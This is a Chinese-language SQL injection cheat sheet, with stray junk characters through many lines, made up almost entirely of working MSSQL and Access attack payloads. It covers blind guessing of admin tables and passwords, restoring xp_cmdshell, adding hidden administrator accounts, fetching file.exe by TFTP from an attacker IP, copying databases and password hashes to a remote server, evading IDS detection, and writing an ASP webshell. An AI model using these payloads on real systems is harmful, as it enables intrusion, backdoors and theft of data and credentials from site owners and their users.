
SQL注入语句2

1. 判断有无注入点
. h$ S) Q5 ^8 N& v& v0 C7 L2 e; and 1=1 and 1=2
, K$ V0 J+ I+ j. @' L1 N( j- H. T
- n( t1 z/ d; z! A1 o2 c: b7 B, A) t7 t
2. 猜表:一般的表的名称无非是 admin、adminuser、user、pass、password 等。
and 0<>(select count(*) from *) " E- ?- w* W" a  `* l5 p) t7 |
and 0<>(select count(*) from admin) ---判断是否存在admin这张表   u! p. a( y' K+ |) a1 P

: Z# A& ?' F* q7 Y; @! M1 `" H. j2 g
3. 猜帐号数目:如果遇到 0< 返回正确页面、1< 返回错误页面,说明帐号数目就是 1 个。
and 0<(select count(*) from admin) 8 O- G$ _# \! x, Q# L  v
and 1<(select count(*) from admin)
% c' p$ y6 T! h猜列名还有 and (select count(列名) from 表名)>0# p: i  |7 B3 i$ H1 n4 f+ h

3 c. [0 D4 T* a; `
4. 猜解字段名称:在 len( ) 括号里面加上我们想到的字段名称。
! m/ Q: ?) j/ ^0 Iand 1=(select count(*) from admin where len(*)>0)--
, X- {) ?8 A" H* land 1=(select count(*) from admin where len(用户字段名称name)>0)
. H, J) B! p/ W' B# land 1=(select count(*) from admin where len(密码字段名称password)>0) ) M4 k1 t# C2 x1 `- \6 m3 m
: y* A3 c( h' u5 C2 T2 G8 s
5. 猜解各个字段的长度:猜解长度就是把 >0 变换,直到返回正确页面为止。
and 1=(select count(*) from admin where len(*)>0)
1 D9 a: I2 G$ Q- Land 1=(select count(*) from admin where len(name)>6) 错误 8 s& N/ c* H3 q! i2 U: P* x; |
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 4 e, A9 N& a, L+ v3 O- z
and 1=(select count(*) from admin where len(name)=6) 正确
2 }1 y6 a8 t/ B; t; P" Q$ o; }8 c" w0 Q5 c2 N$ w( |; Q
and 1=(select count(*) from admin where len(password)>11) 正确 + j3 D, {8 M1 k; m- O9 @7 _
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
0 t* W; S- l  D, Tand 1=(select count(*) from admin where len(password)=12) 正确 / P$ H" X/ \& H/ ?5 j, w
猜长度还有 and (select top 1 len(username) from admin)>5) h! H7 F9 R8 i! @) `' R
  u) H7 G: N! b0 K# F' H0 }
( B7 n- _' R  X  B  Q
6. 猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
% j* Z) @# f: }& _/ f" ~$ oand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 9 e4 r9 z4 M) e4 a, }! C  h! G9 k
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
0 D* F  Y  M4 H
! D' u6 q( ]6 s9 t" P( [, R猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算' V, m% o- l3 v; S6 W
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- ; F( @" Z9 G3 q0 [
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
6 K( Y) J/ P( v8 Q0 s
7 N* H8 b" ^9 n# ^! @: v: G" Ygroup by users.id having 1=1--
, p, {. W# Q# Zgroup by users.id, users.username, users.password, users.privs having 1=1--
( j# _5 e, ~* D2 D" U& S; insert into users values( 666, attacker, foobar, 0xffff )--
: ?" S" [5 p0 e9 f
' [. E0 g# x- R  R  G) H* c  kUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- ' q7 N8 J# Q) z  p( I( e& E9 X. \
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- " V# i0 t! T& g/ Y9 B  K
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
& {1 r: c$ {, c" Z* CUNION SELECT TOP 1 login_name FROM logintable- 2 @7 {) B) f& _+ ^0 ~4 }2 @2 \: l
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
, v" t2 q* A1 Q1 N
看服务器打的补丁(出错了=打了SP4补丁)
5 q% Z6 k, y& F$ V7 uand 1=(select @@VERSION)-- ! X( {3 H5 l* D% F; a
$ d7 x& y- r% J# p1 j
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
5 K1 P6 ?- P" S0 F% P3 L, V1 nand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
+ |7 V3 p5 ?" r' e, I
判断连接数据库帐号。(采用 SA 账号连接,返回正常=证明了连接账号是 SA)
1 @8 v1 M7 i) qand sa=(SELECT System_user)--
. z- c# P( K1 y5 D1 P( Uand user_name()=dbo--
8 k8 y+ w/ y' V& tand 0<>(select user_name()-- : v6 T0 m$ N3 G; i1 A. \  Q

看 xp_cmdshell 是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
* {! n! d; c; [  c6 i! q0 ]+ v3 w% M- Q/ L* Y: S9 Q  A
xp_cmdshell 被删除后可以恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- ; G5 J) E1 ~6 [0 t
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
) b& `' k: o3 @- m/ T5 ?9 @
反向 PING 自己实验
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- % B/ u! O) J( v9 F' M! ]5 ?

加帐号
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
5 i; `1 i& p( V0 f# z' J6 P! E& X% ?& t
创建一个虚拟目录E盘:
' c7 {4 B% @. ?) l2 g6 g;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
' {! B5 c2 d9 L6 K2 ~( t
访问属性:(配合写入一个 webshell)
- B2 M+ a' C- K. P# O6 mdeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
( N$ T# Z4 H4 u9 q- G
5 X+ t6 Z* R9 h& N+ a8 ~) Q
MSSQL 也可以用联合查询
! @0 S4 P! e) E' ]/ p/ F9 y$ {?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
% D/ ?. B, w3 P, b+ J?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
  |5 k0 N  k1 y0 e% ^# U( I* m0 V/ @; [

爆库特殊技巧:%5c=\ 或者把/和\ 修改%5提交
' g; R6 ^0 T* ~0 e5 }
7 Z. k) w$ x* {. y: w" V6 B

得到 WEB 路径
3 \- I- n- W4 ?;create table [dbo].[swap] ([swappass][char](255));-- ' Q! |/ E# s# j  _9 A% J6 g
and (select top 1 swappass from swap)=1-- 7 K5 X  l# o# {9 k
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
; R% G& J# _8 ?" @# p2 o. v;use ku1;-- * k# ]8 d' j- Q$ M
;create table cmd (str image);-- 建立image类型的表cmd 5 C9 L2 a) o: Q. x" [2 M6 p) R& E$ T# p, c
! W4 _- m  D' U  T9 p( ~% ?
存在xp_cmdshell的测试过程:
6 G9 n) a7 H3 ?$ \6 H, r6 {;exec master..xp_cmdshell dir
  D9 a; o: q" D% S;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 # o* Y% m2 Q' L9 l' k8 @6 j
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
4 |$ K& R: n# o6 f& f3 h;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 1 W1 W+ j  X3 F: V: z/ a: y  D: Z( I4 b
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- ; X% y$ K0 P  o, |5 T3 W0 U' \
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- ! |" Q( C6 J, `8 i
exec master..xp_servicecontrol start, schedule 启动服务 ) E) V! L' ~% N' r$ X) Y& N
exec master..xp_servicecontrol start, server 0 G$ [% n; |( q; \8 A6 |; u$ V! j0 M
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add ) }$ z# p1 n$ V; l  K
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
! M6 n4 n' i% X$ V8 [, w: W. t9 U" @; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 1 C; L0 V9 A6 A5 z3 h" Q& V  P/ d

0 @4 L, u/ f( F1 t) ~5 y;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ " {' w) T/ z) v1 ^. v0 _
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
. [8 P8 ^3 Q2 l4 r' A7 v5 };declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
, t5 s* L. H1 s$ [8 l% w8 X如果被限制则可以。 5 n9 I+ j) [/ \* b0 J
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) 1 u- C5 m. W- J0 \$ Z
' U' R# S9 u" V) T5 a( Q2 g
查询构造:
SELECT * FROM news WHERE id=... AND topic=... AND .....
( X$ M9 D& S( k* O$ Jadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 3 g  ?7 J& {+ i
select 123;--
: b6 U# x" {* s) h;use master;--
9 D( j4 J! V- E# T  W+ ~:a or name like fff%;-- 显示有一个叫ffff的用户哈。
0 w6 z) p0 N8 z1 {; }0 ~and 1<>(select count(email) from [user]);--
% a: q2 }" B) u6 }$ Z1 l;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- 4 a* d& Y; w3 C5 ]0 h. r
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- 5 n+ [& a2 B2 T# z$ R3 ?
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
2 Y3 O  Q; y8 w6 J! Z- K2 O3 q* _;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
8 a& `) z+ A$ s4 z2 D8 A1 K) c;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
  A2 s4 ]2 K/ {;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- + C) l& b4 @+ W% _& p  T' ^
上面的语句是得到数据库中的第一个用户表,并把表名放在 ffff 用户的邮箱字段中。
通过查看 ffff 的用户资料可得第一个用户表叫 ad
然后根据表名 ad 得到这个表的 ID,进而得到第二个表的名字

! r' A) ^% H, i& r% y, z; [( w6 Ginsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- & v' }+ w- F6 T9 m6 i9 o8 q9 x
insert into users values( 667,123,123,0xffff)-- ! E% ]+ A2 s& a0 {# |
insert into users values ( 123, admin--, password, 0xffff)-- , p7 @3 U0 J1 B7 Z5 v
;and user>0
5 f" ~8 n1 D( l8 v5 T7 w$ o6 q;and (select count(*) from sysobjects)>0
0 x1 H% r' Y* E* [" r6 H;and (select count(*) from mysysobjects)>0 //为access数据库 + G+ |3 O2 V; y5 ~; k

枚举出数据表名
/ A0 M$ B% K4 ~;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
这是将第一个表名更新到 aaa 的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
1 }. \. o7 f1 \4 D# X3 @$ b$ V, J! N;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- " w) M3 C' o( F4 `
然后id=1552 and exists(select * from aaa where aaa>5) * z$ {+ R( z& l: g; ^5 g3 }( D* m
读出第二个表;就这样一个个地读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- / |" @+ |/ x7 A1 G8 i) `$ Y
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
$ k6 S. B5 ?, p& `; w7 E;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
* s9 X0 P0 y/ b# \然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
' ?( J7 ?. G  t1 }. x- E
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
% F' f7 E$ n/ G. {update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
通过 SQLSERVER 注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是 SYSADMIN 组]

[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
5 ~: {8 P6 E0 g" n7 [update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
* T8 P9 D) e5 o# L/ U# k* J% M$ Q7 k0 R' ]* n) i. v+ E' M' I
绕过 IDS 的检测[使用变量]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ * N5 a, ~1 m9 ?% Z9 m' f) U
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
& m) |. V& b/ T8 L8 K9 W$ }# Y2 _2 a9 f, ~! N& |( Z
1、开启远程数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
参数:(1) OLEDB Provider name
2、其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table % [# ~' M6 }/ n" n2 I9 Q
3、复制目标主机的整个数据库:insert 所有远程表到本地表。
) E9 M4 x$ L& Y5 o# M% o
基本语法:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 , j7 D: Z' l6 u3 o
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
# I; }: a) V. h2 k4 L2 Minsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 5 W% G# f! |% t
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) 7 _$ `& a0 D/ Y2 o3 F
select * from master.dbo.sysdatabases
5 v# x. m; @; a$ Vinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects) ) ]9 D- h% \& {3 I! n; U% c
select * from user_database.dbo.sysobjects ( J/ r2 Z+ u+ y: l) n/ ?, H4 b
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) ( x* k! Y& q1 q
select * from user_database.dbo.syscolumns
复制数据库:
$ ]0 M: n; x  y& n  ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 & o( i* P) e9 k# r
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
( T% R% z8 h: ?: f3 T. r& g4 @% S$ e7 a% Q, u
复制哈希表(HASH):登录密码的 hash 存储于 sysxlogins 中。方法如下:
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
得到 hash 之后,就可以进行暴力破解。

遍历目录的方法:先创建一个临时表 temp
) ^6 G# Q3 X& j- J! R1 B* O;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- , k) ^8 N# H' b% B
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 0 E9 F5 M& V. L  z6 M; R7 x+ l, j- n
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 ; g- a- p$ G' P' u" q
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
" x/ ~8 x3 j7 @1 R/ `9 p;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容   ]$ z9 a) n9 @) S) D8 v0 i! w4 e
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
+ w2 F9 m# [2 z. P+ z;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- 9 M" b- B* R0 n4 p  q# Z
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
& M( ^+ K3 C$ ^' L;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) ! B* C6 f, D' W/ F# b# H
写入表:
) Y- G0 {, E' }语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- 2 T* L" \0 U# k8 n
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--   D4 ~5 o4 F) j' ~$ ?- F
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
4 d* P* i8 Y6 e( q  M# v% N  t8 ?语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 5 o8 J: ]8 Y1 E: w2 k$ o
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 9 D. Q. @, [4 {% o* D
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- - I9 _* a0 }0 l! |
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
: X  Y$ U0 P4 L4 W( V5 n0 ?语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
- _! i: c% T$ q6 L5 S: G: Z语句9:and 1=(SELECT IS_MEMBER(db_owner));-- ( |+ H0 C+ J( h+ c* W# |, t

把路径写到表中去:
;create table dirs(paths varchar(100), id int)--
+ V8 T2 v; ?2 F! k) Q+ U7 g;insert dirs exec master.dbo.xp_dirtree c:\-- ! H1 w0 u4 R+ {
and 0<>(select top 1 paths from dirs)--
2 a* O, D; l0 H5 \0 e' S, M9 ^) Dand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- % q* O' L' X: R% F5 `+ u: X3 Q
;create table dirs1(paths varchar(100), id int)--
/ w7 [8 I) v* P7 ]9 y2 B7 T$ U;insert dirs exec master.dbo.xp_dirtree e:\web-- 0 B3 K2 p' g) M; [' I+ M6 j
and 0<>(select top 1 paths from dirs1)-- $ u& L6 {$ ]& u. k; U' H
! J1 s8 s$ u, D$ F8 r( s) l
把数据库备份到网页目录后下载
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- + A6 b4 |$ A4 ]4 a) {

4 Y' c/ z0 T% B, J: r' {# [and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
5 ]: r. a$ b  M% \% O! @  \and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 6 ~2 T2 V  r) o$ L
and 1=(select user_id from USER_LOGIN)
8 }) M# i) j; ?and 0=(select user from USER_LOGIN where user>1)
  t2 N2 U' v5 F' f4 S+ T0 p7 Q# u- K/ Y5 L' D/ y( e' f7 n) n6 i
-=- wscript.shell example -=-
% J) ?1 y+ b' h, F2 V1 J% |5 x6 S1 jdeclare @o int 9 q% P6 l* r! M1 l0 p! Y
exec sp_oacreate wscript.shell, @o out
- M% S& V0 b5 j% eexec sp_oamethod @o, run, NULL, notepad.exe . }/ P7 w2 T  |& N$ z- V
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
% J+ A% H, |- t5 I3 `; p
" K0 L- c2 C2 m' z( _3 Ldeclare @o int, @f int, @t int, @ret int 2 q* `$ w4 T8 F, o3 u  `: A
declare @line varchar(8000)
( x  ~( u; L9 K1 b  dexec sp_oacreate scripting.filesystemobject, @o out
" n9 x9 A; e7 D! g* a! s  h/ w8 aexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
$ A5 S1 l" v2 Bexec @ret = sp_oamethod @f, readline, @line out 2 H' W! L5 y0 v$ f
while( @ret = 0 ) . x7 f, @4 V+ C% V$ Z
begin
! b) ]" A- v! V, oprint @line   M9 }$ _, S6 E5 A  Z) a" j- Z* L
exec @ret = sp_oamethod @f, readline, @line out
4 n6 o7 Q3 M0 Uend
3 T3 s% n! L. A) d  i4 m: `7 ^4 |7 P
declare @o int, @f int, @t int, @ret int 0 @$ I* @& l/ T* k
exec sp_oacreate scripting.filesystemobject, @o out & X1 Y- b, `9 O5 x/ Y3 Z3 l$ k: o
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 ( d  ?9 t( O+ B- e, H- F
exec @ret = sp_oamethod @f, writeline, NULL,
4 N) I" m" ?0 y! R1 a9 K<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %> . v$ P" _9 n: o& M, `! |3 k

, `/ u$ }. `" ?( Ndeclare @o int, @ret int ( d- P- x& q& N5 X: R. g8 J
exec sp_oacreate speech.voicetext, @o out 7 g7 A- B( V# B, f
exec sp_oamethod @o, register, NULL, foo, bar
0 {# w" z3 U( Q% \1 o/ r# }5 a  Lexec sp_oasetproperty @o, speed, 150
9 S; s- G$ p, }1 `% H) [" X( N1 }- wexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
: K  m1 N  \5 s6 rwaitfor delay 00:00:05
* p5 ]( Z% g, W: v$ r- S6 c+ b# c4 q  e
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
; y) R& E, x% G9 ]5 J& Q" Z" w4 p
xp_dirtree 适用权限 PUBLIC
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
9 L: P2 ?5 _: S8 `- Icreate table dirs(paths varchar(100), id int)
建表,这里建的表是和上面 xp_dirtree 相关联,字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!) K* g" Z; `: x, [